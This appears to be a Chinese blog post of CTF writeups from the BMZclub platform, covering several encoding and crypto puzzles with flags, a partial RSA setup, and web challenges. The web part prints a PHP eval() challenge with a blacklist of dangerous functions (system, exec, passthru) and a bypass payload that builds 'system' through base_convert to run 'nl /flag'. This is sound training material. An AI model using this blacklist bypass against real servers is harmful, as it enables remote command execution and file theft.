当前位置:网站首页>[wp]bmzclub几道题的writeup
[wp]bmzclub几道题的writeup
2022-07-05 03:33:00 【_小飒】
边刷题,边写wp
Crypto
4进制
a=["1212","1230","1201","1213","1323","1012","1233","1311","1302","1202","1201","1303","1211","301","302","303","1331"]
for i in a:
print(chr(int(i,4)),end="")
flag{Fourbase123}
2018 AFCTF Morse
-… .---- -… -… -… …-- --… …- -… -… --… -… …-- .---- --… …-- …— --… --… …- … …-. --… …-- …-- ----- … …-. …-- …-- …-- …- …-- … --… ----. --… -…
61666374667B317327745F73305F333435797D
afctf{1s’t_s0_345y}
2018 HEBTUCTF 社会主义接班人
https://atool.vip/corevalue/
HEBTUCTF{ejvovdasfjfvmrfmsdemxj}
Ook
在线解密:https://www.splitbrain.org/services/ook
flag{1c470f09af4c86b7}
easy_base
40次base64解密
flag{S0_many_Bas3}
栅栏中的base
4C4A5645455232524B3533544B544C4C4A5A5545324D434749564E48553344474A564548495A53524E595944323D3D3D
base16-32-64-栅栏
flag{0939_F2A_BACD0}
【2021医疗行业CTF】base编码
R1kzRE1RWldHRTNET04yQ0dZWkRNTUpYR00zREtNWldHTTJES1JSVEdNWlRFTktHR01ZVEdOUlZJWTNES05SUkc0WlRPT0pWSVkzREVOUlJHNFpUTU5KWElRPT09PT09
flag{base64_32_16_easy_base}
easy_rsa
n = 20499421483319837632829005665244953604816631094131482091599739242452461959670789327098587429656441009883765163931516947567316643569963621519243386576155541991650610105070387440479691299670503655019032377026089584152047162143622592606512093871068907193787013919967475201572411584456318069752118161110853731611597336602111728937901380008855876406951363681839727114631417566905375167058609392654378267988132283758536576123045237315624774544667706040426027925497245266590365080287798629911056879889563806490213919247917120199512548392006107613124668838850719777385822083736801474373012496703900585089950184532462833403107
e = 65537
c = 200325719083345565187069963506283537628579320903739336814008889443127859476616166940947011958628507
对n进行分解
p=138149558149136946723702853693217798862267316666189942816520886165357260194916654034965226246613620482905011306996465659544456451870958162107819485799987144997514278358234816986266518092303586753050671210149075296173319503677929313696499057977134617244449388706566611756401925702906820026584248278446237580517
q=148385718767120808294577062519850184639495614793281052895346144216250114087102888222369065569059037636249358547628359333320754976046188817562335343752474101985879697854111246597090633214354135620808419945688374075276767391174302507279227429182436807739268769378015447834458981548109968262808179707802448799271
e=65537
c=200325719083345565187069963506283537628579320903739336814008889443127859476616166940947011958628507
phi=(p-1)*(q-1)
web
WEB_ezeval
<?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents'); $cmd = str_ireplace($black_list,"BMZCTF",$cmd); eval($cmd); ?>很简单很多方法都可以绕过
我的payload:
cmd=base_convert(1751504350,10,36)('nl /flag');
黑曜石浏览器
User-Agent: HEICORE/49.1.2623.213
流量监控平台
写个盲注脚本
得到password:
e10adc3949ba59abbe56e057f20f883e
这里cp和利用ceye.io都不行。后来搜wp以前可以,不知道是不是环境出问题了
边栏推荐
- 2021 Li Hongyi machine learning (3): what if neural network training fails
- How to learn to get the embedding matrix e # yyds dry goods inventory #
- [groovy] string (string injection function | asBoolean | execute | minus)
- Mongodb common commands
- Qrcode: generate QR code from text
- Daily question 2 12
- Yuancosmic ecological panorama [2022 latest]
- Cette ADB MySQL prend - elle en charge SQL Server?
- 腾讯云,实现图片上传
- The perfect car for successful people: BMW X7! Superior performance, excellent comfort and safety
猜你喜欢
qrcode:将文本生成二维码
Port, domain name, protocol.
Multimedia query
2021 Li Hongyi machine learning (3): what if neural network training fails
Tiny series rendering tutorial
Azkaban实战
Subversive cognition: what does SRE do?
How to define a unified response object gracefully
2021 Li Hongyi machine learning (2): pytorch
Sqoop installation
随机推荐
51 independent key basic experiment
this+闭包+作用域 面试题
Port, domain name, protocol.
Hot knowledge of multithreading (I): introduction to ThreadLocal and underlying principles
040. (2.9) relieved
程序员的视力怎么样? | 每日趣闻
Quick start of UI component development of phantom engine [umg/slate]
Acwing game 58 [End]
There is a question about whether the parallelism can be set for Flink SQL CDC. If the parallelism is greater than 1, will there be a sequence problem?
Basic knowledge of tuples
Voice chip wt2003h4 B008 single chip to realize the quick design of intelligent doorbell scheme
有个疑问 flink sql cdc 的话可以设置并行度么, 并行度大于1会有顺序问题吧?
Cette ADB MySQL prend - elle en charge SQL Server?
[learning notes] month end operation -gr/ir reorganization
Yyds dry goods inventory intelligent fan based on CC2530 design
Why do some programmers change careers before they are 30?
[deep learning] deep learning reference materials
LeetCode 237. Delete nodes in the linked list
Dart series: collection of best practices
The perfect car for successful people: BMW X7! Superior performance, excellent comfort and safety